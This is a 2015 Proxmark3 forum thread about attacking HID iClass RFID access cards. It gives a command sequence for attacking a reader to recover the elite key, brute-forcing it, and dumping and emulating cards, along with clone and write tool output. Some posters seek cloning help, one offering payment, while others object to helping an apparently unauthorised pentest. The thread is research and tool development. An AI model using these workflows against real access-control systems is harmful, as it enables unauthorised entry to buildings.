iClass is coming...

carl55 · 2015-04-25 18:47:41

Wow, it looks like I missed all of the interesting discussions that have been occuring while I slept last night.
There appears to be an ethical dilemma here. Do we help @ET4 or not?

If @ET4 was not hired by the building owner/manager or their current security installer to do the pentest then who hired him?
My guess is that it was the "former" security installer who is now trying to discredit the "current" security company by showing that the building in question is vulnerable to an attack using the PM3's latest iclass capabilities.

The information that was divulged by @ET4 in the post earlier today (if it hasn't yet been removed) gives sufficient information to provide a hacker access into that building.
Since I happen to be familiar with that particular high security key I am able to associate the published card data to a particular building .... and I don't even live in Australia.

As a result, my personal preference would be to withhold any further assistance.

asper · 2015-04-26 00:07:31

All the good people here do what they do for passion not for money/fraud.
I ask the moderators to remove such posts and preferably perma-ban people posting/requesting those kind of stuff without any warning.

joe · 2015-05-10 16:33:02

holiman wrote:

He means standard. For elite, you can attack the reader with pm3. Please read through this thread, and my blogposts and you will get a better understanding

I read through the whole thread, but can't find any direct cmd to read it, and some cmd are not exist at all. any links that i can read more of your blogpost ? thanks ( i am using pm3-bin 2.0.0 )

holiman · 2015-05-14 21:06:24

Links are here: http://martin.swende.se/blog/Elite-Hacking.html and http://martin.swende.se/blog/PM3-development.html (lastest).
'hf iclass sim 2' <- attack reader, get dump
'hf iclass loclass f <file>' <- bruteforce dump
'hf iclass dump <key> e' <- dump tag with elite key <key>
'hf iclass eload <dumpfile>' <- load data into pm3
'hf iclass sim 3' <-- full simulation of the dumped tag.

I may have some parameters wrong, writing off the top of my head.

atwolf · 2015-05-15 01:16:34

Is it just me or given your work holiman on extracting the elite key from a reader over the air. Its much easier to break the elite system then it is to break the regular method due to actually needing to obtain an older reader and dumping the memory to extract the HID master key.

holiman · 2015-05-15 13:23:42

@atwolf - yes, if you don't have the standard key already, it's definitely simpler to break an elite than a standard system.

atwolf · 2015-05-16 10:27:01

holiman wrote:

@atwolf - yes, if you don't have the standard key already, it's definitely simpler to break an elite than a standard system.

I don't know why but this amuses me greatly.

Still working on the standard to get the key, but I certainly wont be recommending moving to Elite.

joe · 2015-06-01 15:39:50

holiman wrote:

He means standard. For elite, you can attack the reader with pm3. Please read through this thread, and my blogposts and you will get a better understanding

Hi Holiman,

how to find out the card standard or elite ? from the outlook, both cards look alike. thanks

goaz · 2015-06-19 02:48:57

I don't use pm3 has been 1year, My pm3 firmware too old,
Can you send your pm3 firmware to me, pls compression to Zip, My computer cannot use RAR.
Thank you. i got the key now!! Thank you holiman b4 help me!!

goaz · 2015-06-19 02:50:03

goaz wrote:

I don't use pm3 has been 1year, My pm3 firmware too old,
Can you send your pm3 firmware to me, pls compression to Zip, My computer cannot use RAR.
Thank you. i got the key now!! Thank you holiman b4 help me!!

plz send to my email:goazvincent@gmail.com

Go_tus · 2015-07-12 09:30:01

Last edited by Go_tus (2015-07-12 16:13:51)

holiman · 2015-07-12 23:37:25

Go_tus - why did you remove your post ? Looked like you implemented write (and something more?). Please post a PR to github.

Go_tus · 2015-07-13 05:36:00

Yes Holiman, give me a bit time to clean up the code.
Will fix the code and release on next week, so "everyone can benefit" as someone told me
As you can see I still have a no idea what I am doing, content of data block are sensitive.

[== Undefined ==]
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0           
Waiting for device to dump data. Press button on device and key on keyboard to abort...          
.#db#      00: 3a 40 8b 01 f8 ff 12 e0                 
#db#      01: 12 ff ff ff 7f 1f ff 3c                 
#db#      02: fe ff ff ff ff ff ff ff                 
#db#      03: ff ff ff ff ff ff ff ff                 
#db#      04: ff ff ff ff ff ff ff ff                 
#db#      05: ff ff ff ff ff ff ff ff                 
#db#      06: 03 03 03 03 00 03 e0 17                 
#db#      07: 1b 86 6f 33 d6 7f 8f 59                 
#db#      08: 2a d4 c8 21 1f 99 68 71                 
#db#      09: 2a d4 c8 21 1f 99 68 71                 
#db#      0a: ff ff ff ff ff ff ff ff                 
#db#      0b: ff ff ff ff ff ff ff ff                 
#db#      0c: ff ff ff ff ff ff ff ff                 
#db#      0d: ff ff ff ff ff ff ff ff                 
#db#      0e: ff ff ff ff ff ff ff ff                 
#db#      0f: ff ff ff ff ff ff ff ff                 
#db#      10: ff ff ff ff ff ff ff ff                 
#db#      11: ff ff ff ff ff ff ff ff                 
#db#      12: ff ff ff ff ff ff ff ff                 
#db#      13: ff ff ff ff ff ff ff ff                 
#db#      14: ff ff ff ff ff ff ff ff                 
#db#      15: ff ff ff ff ff ff ff ff                 
#db#      16: ff ff ff ff ff ff ff ff                 
#db#      17: ff ff ff ff ff ff ff ff                 
#db#      18: ff ff ff ff ff ff ff ff                 
#db#      19: ff ff ff ff ff ff ff ff                 
#db#      1a: ff ff ff ff ff ff ff ff                 
#db#      1b: ff ff ff ff ff ff ff ff                 
#db#      1c: ff ff ff ff ff ff ff ff                 
#db#      1d: ff ff ff ff ff ff ff ff                 
#db#      1e: ff ff ff ff ff ff ff ff                 
#db#      1f: ff ff ff ff ff ff ff ff                 
Got 256 bytes data (total so far 0)          
.Dumped 256 bytes of data from tag.           
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-2.bin'          
proxmark3> hf iclass
help             This help          
list             [Deprecated] List iClass history          
snoop            Eavesdrop iClass communication          
sim              Simulate iClass tag          
reader           Read an iClass tag          
replay           Read an iClass tag via Reply Attack          
dump             Authenticate and Dump iClass tag          
write            Authenticate and Write iClass block          
load             Load from tagfile to iclass card          
loclass          Use loclass to perform bruteforce of reader attack dump          
eload            [experimental] Load data into iclass emulator memory          
decrypt          Decrypt tagdump          
readtagfile      Display Content from tagfile          
calc_ekey        Give Diversify key for this card to write to block 3          
readkeyfile      Read and display key from file          
writekeyfile     Write key to file          
clone            Clone tag          
loadhskey        Load HS Key          
showhskey        Show HS Key          
proxmark3> hf iclass readtagfile iclass_tagdump-3a408b01f8ff12e0-2.bin 
CSN :      3A 40 8B 01 F8 FF 12 E0
block[06]: 03 03 03 03 00 03 E0 17 
block[07]: 1B 86 6F 33 D6 7F 8F 59 
block[08]: 2A D4 C8 21 1F 99 68 71 
block[09]: 2A D4 C8 21 1F 99 68 71 
block[0A]: FF FF FF FF FF FF FF FF 
block[0B]: FF FF FF FF FF FF FF FF 
block[0C]: FF FF FF FF FF FF FF FF 
block[0D]: FF FF FF FF FF FF FF FF 
block[0E]: FF FF FF FF FF FF FF FF 
block[0F]: FF FF FF FF FF FF FF FF 
block[10]: FF FF FF FF FF FF FF FF 
block[11]: FF FF FF FF FF FF FF FF 
block[12]: FF FF FF FF FF FF FF FF 
block[13]: FF FF FF FF FF FF FF FF 
block[14]: FF FF FF FF FF FF FF FF 
block[15]: FF FF FF FF FF FF FF FF 
block[16]: FF FF FF FF FF FF FF FF 
block[17]: FF FF FF FF FF FF FF FF 
block[18]: FF FF FF FF FF FF FF FF 
block[19]: FF FF FF FF FF FF FF FF 
block[1A]: FF FF FF FF FF FF FF FF 
block[1B]: FF FF FF FF FF FF FF FF 
block[1C]: FF FF FF FF FF FF FF FF 
block[1D]: FF FF FF FF FF FF FF FF 
block[1E]: FF FF FF FF FF FF FF FF 
block[1F]: FF FF FF FF FF FF FF FF 
proxmark3> hf iclass write 0A 0000000000000000
isOk:06          
CSN: 3a 40 8b 01 f8 ff 12 e0           
#db# reply             [00000000000000008f72]                 
#db# read block [0a] [0000000000000000]                 
#db# Write block [0a] ok                 
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0           
Waiting for device to dump data. Press button on device and key on keyboard to abort...          
.#db# Error: Authentication Fail!                 
#db# Error: Authentication Fail!                 
#db#      00: 3a 40 8b 01 f8 ff 12 e0                 
#db#      01: 12 ff ff ff 7f 1f ff 3c                 
#db#      02: fe ff ff ff ff ff ff ff                 
#db#      03: ff ff ff ff ff ff ff ff                 
#db#      04: ff ff ff ff ff ff ff ff                 
#db#      05: ff ff ff ff ff ff ff ff                 
#db#      06: 03 03 03 03 00 03 e0 17                 
#db#      07: 1b 86 6f 33 d6 7f 8f 59                 
#db#      08: 2a d4 c8 21 1f 99 68 71                 
#db#      09: 2a d4 c8 21 1f 99 68 71                 
#db#      0a: 00 00 00 00 00 00 00 00                 
#db#      0b: ff ff ff ff ff ff ff ff                 
#db#      0c: ff ff ff ff ff ff ff ff                 
#db#      0d: ff ff ff ff ff ff ff ff                 
#db#      0e: ff ff ff ff ff ff ff ff                 
#db#      0f: ff ff ff ff ff ff ff ff                 
#db#      10: ff ff ff ff ff ff ff ff                 
#db#      11: ff ff ff ff ff ff ff ff                 
#db#      12: ff ff ff ff ff ff ff ff                 
#db#      13: ff ff ff ff ff ff ff ff                 
#db#      14: ff ff ff ff ff ff ff ff                 
#db#      15: ff ff ff ff ff ff ff ff                 
#db#      16: ff ff ff ff ff ff ff ff                 
#db#      17: ff ff ff ff ff ff ff ff                 
#db#      18: ff ff ff ff ff ff ff ff                 
#db#      19: ff ff ff ff ff ff ff ff                 
#db#      1a: ff ff ff ff ff ff ff ff                 
#db#      1b: ff ff ff ff ff ff ff ff                 
#db#      1c: ff ff ff ff ff ff ff ff                 
#db#      1d: ff ff ff ff ff ff ff ff                 
#db#      1e: ff ff ff ff ff ff ff ff                 
#db#      1f: ff ff ff ff ff ff ff ff                 
Got 256 bytes data (total so far 0)          
.Dumped 256 bytes of data from tag.           
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-3.bin'          
proxmark3> 
proxmark3> hf iclass clone iclass_tagdump-3a408b01f8ff12e0-2.bin 06 0a
File name   : iclass_tagdump-3a408b01f8ff12e0-2.bin
start block : 06
  end block : 0a
block [06] [030303030003E017]
block [07] [1B866F33D67F8F59]
block [08] [2AD4C8211F996871]
block [09] [2AD4C8211F996871]
block [0A] [FFFFFFFFFFFFFFFF]
block [0B] [FFFFFFFFFFFFFFFF]
block [0C] [FFFFFFFFFFFFFFFF]
block [0D] [FFFFFFFFFFFFFFFF]
block [0E] [FFFFFFFFFFFFFFFF]
block [0F] [FFFFFFFFFFFFFFFF]
block [10] [FFFFFFFFFFFFFFFF]
block [11] [FFFFFFFFFFFFFFFF]
block [12] [FFFFFFFFFFFFFFFF]
block [13] [FFFFFFFFFFFFFFFF]
block [14] [FFFFFFFFFFFFFFFF]
block [15] [FFFFFFFFFFFFFFFF]
block [16] [FFFFFFFFFFFFFFFF]
block [17] [FFFFFFFFFFFFFFFF]
block [18] [FFFFFFFFFFFFFFFF]
block [19] [FFFFFFFFFFFFFFFF]
block [1A] [FFFFFFFFFFFFFFFF]
block [1B] [FFFFFFFFFFFFFFFF]
block [1C] [FFFFFFFFFFFFFFFF]
block [1D] [FFFFFFFFFFFFFFFF]
block [1E] [FFFFFFFFFFFFFFFF]
block [1F] [FFFFFFFFFFFFFFFF]
isOk:06          
CSN: 3a 40 8b 01 f8 ff 12 e0           
#db# Write block [06] ok                 
#db# Write block [07] ok                 
#db# Write block [08] ok                 
#db# Write block [09] ok                 
#db# Write block [0a] fail                 
#db# Clone incomplete                 
proxmark3> hf iclass dump
CSN: 3a 40 8b 01 f8 ff 12 e0           
Waiting for device to dump data. Press button on device and key on keyboard to abort...          
.#db#      00: 3a 40 8b 01 f8 ff 12 e0                 
#db#      01: 12 ff ff ff 7f 1f ff 3c                 
#db#      02: fe ff ff ff ff ff ff ff                 
#db#      03: ff ff ff ff ff ff ff ff                 
#db#      04: ff ff ff ff ff ff ff ff                 
#db#      05: ff ff ff ff ff ff ff ff                 
#db#      06: 03 03 03 03 00 03 e0 17                 
#db#      07: 1b 86 6f 33 d6 7f 8f 59                 
#db#      08: 2a d4 c8 21 1f 99 68 71                 
#db#      09: 2a d4 c8 21 1f 99 68 71                 
#db#      0a: 00 00 00 00 00 00 00 00                 
#db#      0b: ff ff ff ff ff ff ff ff                 
#db#      0c: ff ff ff ff ff ff ff ff                 
#db#      0d: ff ff ff ff ff ff ff ff                 
#db#      0e: ff ff ff ff ff ff ff ff                 
#db#      0f: ff ff ff ff ff ff ff ff                 
#db#      10: ff ff ff ff ff ff ff ff                 
#db#      11: ff ff ff ff ff ff ff ff                 
#db#      12: ff ff ff ff ff ff ff ff                 
#db#      13: ff ff ff ff ff ff ff ff                 
#db#      14: ff ff ff ff ff ff ff ff                 
#db#      15: ff ff ff ff ff ff ff ff                 
#db#      16: ff ff ff ff ff ff ff ff                 
#db#      17: ff ff ff ff ff ff ff ff                 
#db#      18: ff ff ff ff ff ff ff ff                 
#db#      19: ff ff ff ff ff ff ff ff                 
#db#      1a: ff ff ff ff ff ff ff ff                 
#db#      1b: ff ff ff ff ff ff ff ff                 
#db#      1c: ff ff ff ff ff ff ff ff                 
#db#      1d: ff ff ff ff ff ff ff ff                 
#db#      1e: ff ff ff ff ff ff ff ff                 
#db#      1f: ff ff ff ff ff ff ff ff                 
Got 256 bytes data (total so far 0)          
.Dumped 256 bytes of data from tag.           
Saved data to 'iclass_tagdump-3a408b01f8ff12e0-6.bin'          
proxmark3>

Last edited by Go_tus (2015-07-16 17:27:17)

marshmellow · 2015-07-19 06:57:58

Does it always fail at blk 0a?
How strong is your antenna?
Have you tried holding your tag about 1 cm off the antenna?

Go_tus · 2015-07-19 12:41:15

My antenna is about 5v not so good.
I don't think I have enough knowledge to make the write function.
the Iclass reader or onmikey do without any
problems.
different data can be write to the block
some data cannot write in that block
same data can be written in another block without any problem.

I don't know what cause it, but some how someone will figure it out. hopefully

[== Undefined ==]
proxmark3> hf iclass write 0b 2020202020202020
Failed to obtain CC! Aborting          
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [faffffff202020209403]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [faffffff202020209403]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 4040404040404040
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [fa404040404040402807]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 8080808080808080
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [8080808080808080c199]                 
#db# Write block [0b] ok                 
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [faffffff808080809403]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 8888888888888888
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [fa33bb00000004bb7b70]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 2020202020202020
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [faffffff000004bb9403]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 0202020202020202
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [fa02020202020202e9cc]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0b 0000000000000000
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [faffffff020202029403]                 
#db# Write block [0b] fail                 
proxmark3> hf iclass write 0c 0000000000000000
CSN: 78 4a 8b 01 f8 ff 12 e0           
#db# reply [00000000000000008f72]                 
#db# Write block [0c] ok                 
proxmark3>

Last edited by Go_tus (2015-07-19 12:43:17)

marshmellow · 2015-07-19 14:26:49

Is that antenna voltage with a tag on it?

Go_tus · 2015-07-19 15:24:22

sorry not even 5v
without a tag # HF antenna: 3.72 V @ 13.56 MHz
with the tag # HF antenna: 3.40 V @ 13.56 MHz
need to do something about it I guess

marshmellow · 2015-07-19 15:25:17

Yeah, that would be your problem

jump · 2015-07-20 15:50:36

For the record, I tried your github repo and it seems that I cannot dump a iClass tag anymore (Failed to authenticate errors). It worked again by reverting back to the main repo.

marshmellow · 2015-07-20 19:20:32

ok ... so i think i'm close. (example below working with AA2 so as not to mess with only tag data i have...

proxmark3> hf iclass managekeys f mykeys.bin l
8 keys loaded
proxmark3> hf iclass clone f iclass_2.bin b 13 l 25 k 1 c
CSN: ea 2d 2e 00 fb ff 12 e0
block [13] [ffffffffffffffff] MAC [dfd534ba]
block [14] [ffffffffffffff14] MAC [ce794f52]
block [15] [ffffffffffffff15] MAC [b3d653a7]
block [16] [ffffffffffffff16] MAC [d8302ab0]
block [17] [ffffffffffffff17] MAC [5179b030]
block [18] [ffffffffffffff18] MAC [8b82ca24]
block [19] [2121212121212219] MAC [071f2341]
block [1a] [ffffffffffffff1a] MAC [c7048d95]
block [1b] [aaffffffffffff1b] MAC [3f6eb7b3]
block [1c] [121212121212121c] MAC [1b24778f]
block [1d] [ffffffffffffff1d] MAC [ada16417]
block [1e] [121212121212121e] MAC [3de088c9]
block [1f] [ffffffffffffff1f] MAC [48d9dc28]
block [20] [ffffffffffffff20] MAC [61c204bb]
block [21] [1212121212121221] MAC [0da61f52]
block [22] [ffffffffffffff22] MAC [a1e3d139]
block [23] [ffffffffffffff23] MAC [3e11bd84]
block [24] [ffffffffffffff24] MAC [e6099f3d]
block [25] [1112112111112125] MAC [3c6f7b4d]
#db# Write block [13] successful
#db# Write block [14] successful
#db# Write block [15] successful
#db# Write block [16] successful
#db# Write block [17] successful
#db# Write block [18] successful
#db# Write block [19] successful
#db# Write block [1a] successful
#db# Write block [1b] successful
#db# Write block [1c] successful
#db# Write block [1d] successful
#db# Write block [1e] successful
#db# Write block [1f] successful
#db# Write block [20] successful
#db# Write block [21] successful
#db# Write block [22] successful
#db# Write block [23] successful
#db# Write block [24] successful
#db# Write block [25] successful
#db# Clone complete
proxmark3> hf iclass dump k 0 c 1
Authentication error
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
     | 00 | REMOVED |
     | 01 | REMOVED |
     | 02 | REMOVED |
     | 03 | REMOVED |
     | 04 | REMOVED |
     | 05 | REMOVED |
     | 06 | REMOVED |
     | 07 | REMOVED |
     | 08 | REMOVED |
     | 09 | REMOVED |
     | 0A | FFFFFFFFFFFFFFFF |
     | 0B | FFFFFFFFFFFFFFFF |
     | 0C | FFFFFFFFFFFFFFFF |
     | 0D | FFFFFFFFFFFFFFFF |
     | 0E | FFFFFFFFFFFFFFFF |
     | 0F | FFFFFFFFFFFFFFFF |
     | 10 | FFFFFFFFFFFFFFFF |
     | 11 | FFFFFFFFFFFFFFFF |
     | 12 | FFFFFFFFFFFFFFFF |
     | 13 | FFFFFFFFFFFFFFFF |
     | 14 | FFFFFFFFFFFFFF14 |
     | 15 | FFFFFFFFFFFFFF15 |
     | 16 | FFFFFFFFFFFFFF16 |
     | 17 | FFFFFFFFFFFFFF17 |
     | 18 | FFFFFFFFFFFFFF18 |
     | 19 | 2121212121212219 |
     | 1A | FFFFFFFFFFFFFF1A |
     | 1B | AAFFFFFFFFFFFF1B |
     | 1C | 121212121212121C |
     | 1D | FFFFFFFFFFFFFF1D |
     | 1E | 121212121212121E |
     | 1F | FFFFFFFFFFFFFF1F |
     | 20 | FFFFFFFFFFFFFF20 |
     | 21 | 1212121212121221 |
     | 22 | FFFFFFFFFFFFFF22 |
     | 23 | FFFFFFFFFFFFFF23 |
     | 24 | FFFFFFFFFFFFFF24 |
     | 25 | 1112112111112125 |
     | 26 | FFFFFFFFFFFFFFFF |
     | 27 | FFFFFFFFFFFFFFFF |
     | 28 | FFFFFFFFFFFFFFFF |
     | 29 | FFFFFFFFFFFFFFFF |
     | 2A | FFFFFFFFFFFFFFFF |
     | 2B | FFFFFFFFFFFFFFFF |

Last edited by marshmellow (2015-07-20 21:53:25)

marshmellow · 2015-07-20 19:30:11

see my branch @ https://github.com/marshmellow42/proxmark3/tree/iclass

jump · 2015-07-20 21:40:16

Cool. I will give it a try!
I tried to use a recent HID reader to sniff trafic but their new protocol between the computer and the badge reader in a real PITA so I was stuck making some progress to control the Omnikey reader instead of focusing on implementing the write commands :-/

marshmellow · 2015-07-20 21:46:31

ultimately we need to add page selection options but it is mostly there now. most the hard work was done by others, i just made it pretty and fixed a few bugs. (there are still some odd things that need to be worked out) and either my antenna doesn't quite cut it or there is still some improvements needed in the low level coding of the protocol. (i have to repeat commands fairly often to ensure they are done. (or repeat when it hit an error - and second time goes through))

marshmellow · 2015-07-20 21:51:09

i'm not ready for a pull request yet, as i need to summarize the cli changes and the new commands, as well as futher testing and bug fixing.

Go_tus · 2015-07-21 14:52:56

I have looked at the code, impressive , I have real problem with my antenna, will try to make one follow your guide.

jump · 2015-07-21 18:05:04

Your code works like a treat marshmellow. Super amazing job!
I've been able to write to badges without any problem. Even converting a Std badge to elite mode worked despite an error when writing the new diversified key to the badge.
This might require a specific handling of blocks 03 and 04 but hey, if you know what you're doing, even with the error message, it actually wrote to the memory.

marshmellow · 2015-07-21 18:42:49

i think there may be something wrong with the write MAC calculation. some tags will have consistant issues writing the same blocks:

proxmark3> hf iclass clone f iclass_1.bin b 0B l 20 k 4
CSN: fc 8c 75 01 f8 ff 12 e0
Block |0b| ffffffffffffffff | MAC |6e921963|
Block |0c| ffffffffffffffff | MAC |cc182f53|
Block |0d| ffffffffffffffff | MAC |0c073b29|
Block |0e| ffffffffffffffff | MAC |88a040b5|
Block |0f| ffffffffffffffff | MAC |a522e17d|
Block |10| ffffffffffffffff | MAC |f3db8c4d|
Block |11| ffffffffffffffff | MAC |ec619ec5|
Block |12| ffffffffffffffff | MAC |f74a406c|
Block |13| ffffffffffffffff | MAC |bf522bc1|
Block |14| ffffffffffffffff | MAC |03efba02|
Block |15| ffffffffffffffff | MAC |d7a0ffdf|
Block |16| ffffffffffffffff | MAC |d09dda1e|
Block |17| ffffffffffffffff | MAC |0d6fdb64|
Block |18| ffffffffffffffff | MAC |95853bdb|
Block |19| ffffffffffffffff | MAC |34912b5b|
Block |1a| ffffffffffffffff | MAC |9b4a1d6f|
Block |1b| aaffffffffffffff | MAC |a0280ada|
Block |1c| ffffffffffffffff | MAC |133e9e40|
Block |1d| ffffffffffffffff | MAC |286630eb|
Block |1e| ffffffffffffffff | MAC |3207d37c|
Block |1f| ffffffffffffffff | MAC |376bbe4b|
Block |20| ffffffffffffffff | MAC |2ecfd23a|
#db# Write block [0b] successful
#db# Write block [0c] successful
#db# Write block [0d] successful
#db# Write block [0e] successful
#db# Write block [0f] successful
#db# Write block [10] successful
#db# Write block [11] failed
#db# Write block [12] successful
#db# Write block [13] failed
#db# Write block [14] successful
#db# Write block [15] failed
#db# Write block [16] successful
#db# Write block [17] successful
#db# Write block [18] failed
#db# Write block [19] successful
#db# Write block [1a] successful
#db# Write block [1b] failed
#db# Write block [1c] successful
#db# Write block [1d] failed
#db# Write block [1e] successful
#db# Write block [1f] successful
#db# Write block [20] failed
#db# Clone incomplete

a write to those block with the same set of data will always fail. but different data will pass.

but a different tag i had no problems writing too.. (only difference = CSN)
also on the changing the keys part. my current understanding is if you have the diversified key of the old key and the diversified key of the new key, the xor of the two is what you write to the key block. correct?
since you are sending an xor of the actual new value the verification will fail. this will need to be handled as an exception. (does the config block react the same way?)

Last edited by marshmellow (2015-07-21 19:03:27)

jump · 2015-07-21 19:15:24

To change the key, I used your command, calc_ekey by giving the HID standard key and the elite key I wanted. And then I wrote it on block 03 using the writeblk command and it worked. The tag is working and I can dump it using the elite key now.

I haven't updated the configuration block (block 01) because most of the time you don't really care changing it. It describes the memory layout of the tag, its size, the fuses, etc. Unless you need to extend the default size of App1 I don't think one would need to change this block.
Writing the HID application config block (block 06) is done like any other block AFAIK.

marshmellow · 2015-07-21 19:34:01

how many tags have you tried writing to with the new code?

the output of the calc_ekey is the xor value of the two div_keys. (good to know this is working)

(i am changing this to calcnewkey and giving other options in my next push)

i think there may be something low level wrong with the code. as in when sending certain binary patterns it always fails. i'm working on narrowing this down. i now think the MAC calc is ok, but something more is wrong.

@holiman, do you have any time to chat?

jump · 2015-07-21 19:39:52

Only got time to test with 1 tag so far. I don't have a lot of blanks with me at the moment.

holiman · 2015-07-21 23:16:44

@marshmellow, great work there!

Just mail me, I'm seldom available on any chat protocols...

Lenox · 2015-09-15 02:30:47

Just wondering if we can clone the HID icalss card.

Chigurh · 2015-09-26 15:58:46

Hi, I am pretty new to PM3 but got it working with Mifare easily however I am trying to read from (what appears to be) an iClass tag and am not really sure if I do things properly.

proxmark3> hf search
CSN: 3c be xx xx xx xx xx xx
Mode: Application [Locked]
Coding: ISO 14443-2 B/ISO 15693
Crypt: Secured page, keys not locked
Crypt: Non secured page
RA: Read access not enabled
Mem: 2 KBits ( 32 * 8 bytes)
AA1: blocks 6-255
AA2: blocks 256-
Valid iClass Tag (or PicoPass Tag) Found - Quiting Search

Now, taking the antenna near the reader and running:
proxmark3> hf iclass sim 2
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
#db# Done...
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
(repeats...)
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)

I believe I followed Martin Swendene's blog post, which looks pretty clear:
http://martin.swende.se/blog/PM3-development.html

I read this post but am not sure exactly if that means the source code needs to be modified before being useable ?
http://www.proxmark.org/forum/viewtopic.php?pid=15192#p15192

Tried with latest release branch and marshmellow's release, to no avail.
Thanks in advance for your help.

holiman · 2015-10-13 09:15:47

If it still fails, look at the output to 'hf iclass list' . It may contain more info about what is happening.

aydiosmio · 2015-10-29 10:18:39

Chigurh wrote:

Now, taking the antenna near the reader and running:
proxmark3> hf iclass sim 2
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
#db# Done...
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
(repeats...)
#db# Unknown command received from reader (len=4): c 2 61 10 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)

It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".

key · 2015-10-30 11:20:47

can you help to make iclass please? i can pay money

Piorun · 2015-11-02 23:05:49

marshmellow wrote:

i'm not ready for a pull request yet, as i need to summarize the cli changes and the new commands, as well as futher testing and bug fixing.

Can you published the fresh/beta proxmark3.exe with new commands for iclass cards?

Last edited by Piorun (2015-11-02 23:14:33)

marshmellow · 2015-11-03 00:55:47

The iclass additions are in the main code trunk on github now. No binaries are distributed tho, you'll have to compile on your own. (And they won't help unless you have the iclass secret keys.)

Piorun · 2015-11-03 18:52:11

aydiosmio wrote:

It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".

I have the same issue: the card label is "HID iClass DL" and reader "HID SE"

proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#... <repeat> ...
#db# Unknown command received from reader (len=4): c 5 de 64 ff fe 5f 2 1c
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack.bin'
proxmark3> exit

Tested on build 2.3.0

Last edited by Piorun (2015-11-03 18:56:43)

Piorun · 2015-11-03 20:00:44

carl55 wrote:

A blank card that comes directly from the factory will have a key that has been diversified using the PicoPass "default" authentication key.
A preprogrammed card that has been initialized by HID will contain a key that has been diversified using the HID Master authentication key.

I have few blank cards, what is the "HID Master authentication key" ?

carl55 · 2015-11-03 20:41:22

Piorun wrote:

I have few blank cards, what is the "HID Master authentication key" ?]

If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers. A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.

Aydiosmio wrote:

It's been my experience that this happens when you attempt the Elite attack against the HID SE readers. However, in the same key system, other types of readers (PCProx) do not return the "unknown command".]

The newer iClass SE readers use a slightly different communication sequence when talking to a credential. I suspect that the "Unknown Command" problem that you are experiencing is a result of the SE reader using a four block (32-byte) "Read4" command. The legacy iclass readers only used single block (8-byte) read commands.
One thing that I noticed with the SE readers is that if the credential does not respond to a 32-byte read command then the reader firmware will simply timeout and then retry using single block (8-byte) read operation. Unfortunately the PM3 appears to be halting after receipt of the unsupported "Read4" (32-byte) read command.

Last edited by carl55 (2015-11-03 20:44:01)

Piorun · 2015-11-03 21:18:42

carl55 wrote:

Piorun wrote:
I have few blank cards, what is the "HID Master authentication key" ?]
If you have a blank/uninitialized card then you should use the PicoPass default key that can be found in the HID iClass Serial protocol document. If you have a pre-programmed iclass card then you will need to obtain the HID Master authentication key that HID installs in all iClass readers.

I think my card are pre-programed (printed label "HID iClass DL")

CSN: 22 xx xx xx xx xx e0           
               Mode: Application [Locked]          
               Coding: ISO 14443-2 B/ISO 15693          
               Crypt: Secured page, keys not locked          
               RA: Read access not enabled          
               Mem: 2 KBits ( 32 * 8 bytes)          
               AA1: blocks 6-18          
               AA2: blocks 19-          
Valid iClass Tag (or PicoPass Tag) Found - Quiting Search

but As I understand previous posts the HID Master key is the same for all new cards?

carl55 wrote:

A method to obtain this key is described in the Milosch Meriac "Heart of Darkness" paper.

I saw this doc, but I don't have access to RW40

key · 2015-11-04 11:47:01

carl55 wrote:

Piorun wrote:
I have few blank cards, what is the "HID Master authentication key" ?]
